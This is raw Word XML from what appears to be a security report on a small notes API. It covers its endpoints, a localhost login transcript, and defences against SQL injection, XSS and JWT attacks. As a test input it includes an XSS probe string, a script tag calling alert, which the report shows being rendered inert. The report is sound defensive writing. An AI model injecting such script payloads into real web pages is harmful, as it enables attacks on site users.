              <w:t>authenticate, returns a JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="567"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Bearer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>returns the caller's notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="567"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Bearer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>creates a note (own choice)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="567"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/notes/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Bearer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>reads one note, scoped to its owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="567"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /health</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>liveness probe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Example interaction, as recorded while testing:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>$ curl -s -X POST http://127.0.0.1:3000/auth/login \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">       -H 'Content-Type: application/json' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">       -d '{"username":"alice","password":"Alice#2026pass"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...","token_type":"Bearer",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> "expires_in":3600,"user":{"id":1,"username":"alice","role":"user"}}</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curl -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:3000/api/data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>401                                   # no token -&gt; rejected</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curl -s http://127.0.0.1:3000/api/data -H "Authorization: Bearer $TOKEN"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>{"notes":[{"id":1,"owner_id":1,"title":"Welcome",...}]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="220"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terminal transcript: login, rejection without a token, and an authorised read.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>3. Implemented Security Measures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>3.1 SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Every statement is prepared once with a constant SQL text and bound parameters; request data never becomes part of the SQL string. This is the only correct defence — escaping quotes is not, because numeric contexts, LIKE clauses and identifier positions all break naive escaping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>// src/db.js -- the SQL text is a literal, only the parameters vary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>findUserByUsername(db, username) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">  return db.prepare('SELECT id, username, password_hash, role FROM users WHERE username = ?')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">           .get(username);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="220"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Code: the login lookup is a prepared statement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>3.2 Cross-site scripting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Two independent layers are used. Input validation rejects values that do not look like a username and enforces length limits on note fields. Output encoding then HTML-escapes every user-controlled string on the way out, so that even a stored payload arrives at the client as inert text.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>// src/security.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>function encodeForOutput(value) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">  if (typeof value === 'string') return escapeHtml(value);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">  if (Array.isArray(value)) return value.map(encodeForOutput);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">  if (value &amp;&amp; typeof value === 'object') { /* recurse over own columns */ }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">  return value;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="220"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Code: recursive output encoding applied to every response body.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Measured effect: the note body &lt;script&gt;alert("xss")&lt;/script&gt; is stored verbatim but returned as &amp;lt;script&amp;gt;alert(&amp;quot;xss&amp;quot;)&amp;lt;/script&amp;gt;, and the automated test asserts that the raw tag never appears in any response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>3.3 Broken authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Passwords are hashed with bcrypt (cost 10) and never stored or returned in plaintext. A successful login issues a JWT signed with HS256, containing only the subject, username and role, with a one-hour expiry and an issuer claim.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>jwt.sign({ sub: String(user.id), username: user.username, role: user.role },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">         secret, { algorithm: 'HS256', expiresIn: '1h', issuer: 'secure-notes-api' });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="220"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Code: token issuing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The verification middleware checks the Bearer scheme, verifies the signature with an explicit algorithm allowlist — which defeats both the alg:none attack and algorithm confusion — validates exp and iss, and then reloads the account from the database so that a token belonging to a deleted user stops working at once.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Two further details are worth naming, because they are what separates a working login from a correct one. First, the handler always performs a bcrypt comparison, even for a username that does not exist, against a dummy hash: without this, the response time would reveal which accounts are registered. Second, five failed attempts per username within fifteen minutes produce HTTP 429, which turns an unlimited online guessing oracle into a rate-limited one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>3.4 Summary</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
